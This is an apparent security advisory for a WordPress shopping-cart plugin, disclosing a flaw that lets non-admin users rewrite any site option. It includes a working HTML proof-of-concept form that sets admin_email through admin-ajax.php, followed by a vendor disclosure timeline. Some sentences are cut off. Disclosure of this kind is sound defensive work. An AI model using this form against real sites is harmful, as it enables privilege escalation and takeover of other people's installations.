Due to a lack of validation in the
ec_ajax_clear_all_taxrates functions located in
/inc/admin/admin_ajax_functions.php, it is possible to update any WordPress option as an authenticated non-admin user, which can in turn lead to privilege escalation and remote code execution.
All versions from 1.1.30 to 3.0.20
Proof of Concept
option_value fields in the below markup to the option and value you wish to update. For a full list of possible options, see the official Option Reference page.
<form action="http://wordpress_installation_path_here/wp-admin/admin-ajax.php?action=ec_ajax_update_option" method="post"> <input type="hidden" name="option_name" value="admin_email" /> <input type="hidden" name="option_value" value="firstname.lastname@example.org" /> <button type="submit">Submit</button> </form>
- 2015-02-22: Discovered vulnerability and contacted vendor to disclose
- 2015-02-23: Acknowledgement from vendor, ETA of 24-48 hours for patch
- 2015-02-23: Contacted vendor again to disclose same vulnerability in another function (
- 2015-02-24: Vendor confirmed issues have been patched and is releasing update shortly
- 2015-02-25: Version 3.0.20 released by vendor
- 2015-02-25: Contacted vendor again to let them know the patch did not resolve the issue and it is still exploitable
- 2015-02-25: Vendor released new update to resolve issues
- 2015-02-25: CVE-ID requested
- 2015-02-26: Public disclosure